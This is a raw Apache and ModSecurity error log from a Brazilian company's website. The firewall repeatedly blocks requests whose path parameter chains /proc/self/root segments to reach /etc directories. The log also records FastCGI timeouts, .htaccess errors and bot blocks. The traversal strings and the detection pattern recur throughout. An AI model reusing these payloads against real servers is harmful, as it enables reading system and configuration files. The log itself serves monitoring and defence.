https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:52:13.131200 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59710] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:52:27.958289 2026] [core:alert] [pid 27403:tid 140411582465792] [client 57.141.18.106:35986] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:52:40.129837 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60554] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:52:46.739766 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.241.31:58784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuBHl_V7PWP6ixUYl5z2wAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:53:09.033927 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33176] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:53:16.183133 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.228.61:57446] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuBPNa6ubjKNq_cu4byIAAAA0k"]
[Thu Mar 19 01:53:23.694824 2026] [core:alert] [pid 31803:tid 140411699963648] [client 57.141.18.95:37586] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:53:37.145902 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33996] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:54:03.135963 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:54:27.457790 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35440] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:54:49.069853 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36050] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:55:06.142543 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:35816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuBquoXxyEfFpUF8f_KVAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:55:09.131871 2026] [core:alert] [pid 31803:tid 140411616036608] [client 57.141.18.9:39998] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:55:11.119666 2026] [core:alert] [pid 14269:tid 140411658000128] [client 57.141.18.3:40010] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:55:11.170109 2026] [proxy_fcgi:error] [pid 19093:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36654] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:55:27.994770 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.244.43:43110] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuBv1_V7PWP6ixUYl50IwAAApg"]
[Thu Mar 19 01:55:34.117829 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37284] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:55:53.476817 2026] [core:alert] [pid 14269:tid 140411725141760] [client 57.141.18.1:41992] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:56:05.078499 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38078] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:56:32.153788 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39136] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:56:44.510252 2026] [core:alert] [pid 30077:tid 140411641214720] [client 57.141.18.10:42954] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:56:57.129828 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39938] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:57:06.985809 2026] [mime_magic:error] [pid 31803:tid 140411691570944] (70014)End of file found: [client 57.141.18.57:43688] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:57:19.146496 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40560] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:57:40.385073 2026] [mime_magic:error] [pid 30077:tid 140411557287680] (70014)End of file found: [client 57.141.18.99:44138] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:57:44.124353 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41356] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:58:09.393863 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42148] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:58:18.762001 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.228.61:57588] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuCagbLMZ6AikZjR9UVxgAAABU"]
[Thu Mar 19 01:58:34.169803 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42994] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:58:38.570451 2026] [mime_magic:error] [pid 14269:tid 140411741927168] (70014)End of file found: [client 57.141.18.15:45502] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:58:41.289519 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.241.31:51400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuCgRkFeYa1D6dYQnCk8AAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:58:44.238500 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:55238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuChOyqAr6etmhZHNodOwAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 01:58:58.122996 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43780] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:59:16.120430 2026] [core:alert] [pid 14269:tid 140411557287680] [client 57.141.18.30:46218] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:59:26.123342 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:59:32.223372 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:57554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuCtMdf6f5d65gmYZQqfQAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:59:54.122026 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45354] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:00:20.149823 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46040] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:00:20.928533 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:47162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuC5AkwaGbbGflqUZBpwwAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:00:32.047223 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:47162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuC8AkwaGbbGflqUZBpxwAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:00:37.068836 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.244.43:44922] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuC9cdf6f5d65gmYZQqnAAAAss"]
[Thu Mar 19 02:00:41.134485 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46590] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:01:03.125800 2026] [proxy_fcgi:error] [pid 17653:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47044] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:01:14.262609 2026] [mime_magic:error] [pid 17653:tid 140411599251200] (70014)End of file found: [client 57.141.18.75:48698] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:01:25.108999 2026] [core:alert] [pid 27403:tid 140411733534464] [client 57.141.18.46:48926] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:01:28.108603 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47540] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:01:45.211280 2026] [mime_magic:error] [pid 15826:tid 140411540502272] (70014)End of file found: [client 57.141.18.33:49304] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:01:50.408827 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:47162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDPgkwaGbbGflqUZBqIwAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:01:54.780518 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.241.31:60880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDQhkFeYa1D6dYQnClPgAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:01:56.110754 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:60896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDROyqAr6etmhZHNodjwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:01:58.602870 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:54298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDRgbLMZ6AikZjR9UWJwAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:02:00.129816 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48366] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:02:06.443776 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:54302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDTgkwaGbbGflqUZBqMwAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:02:11.059094 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.241.31:39684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDU_-YZRR_7pZ7nDJGrAAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:02:20.600573 2026] [core:alert] [pid 14269:tid 140411716749056] [client 57.141.18.113:49982] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:02:21.866357 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.241.31:39688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDXfu8EFLIOrSqIptUFAAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:02:22.161806 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48850] AH01075: Error dispatching request to : (polling)
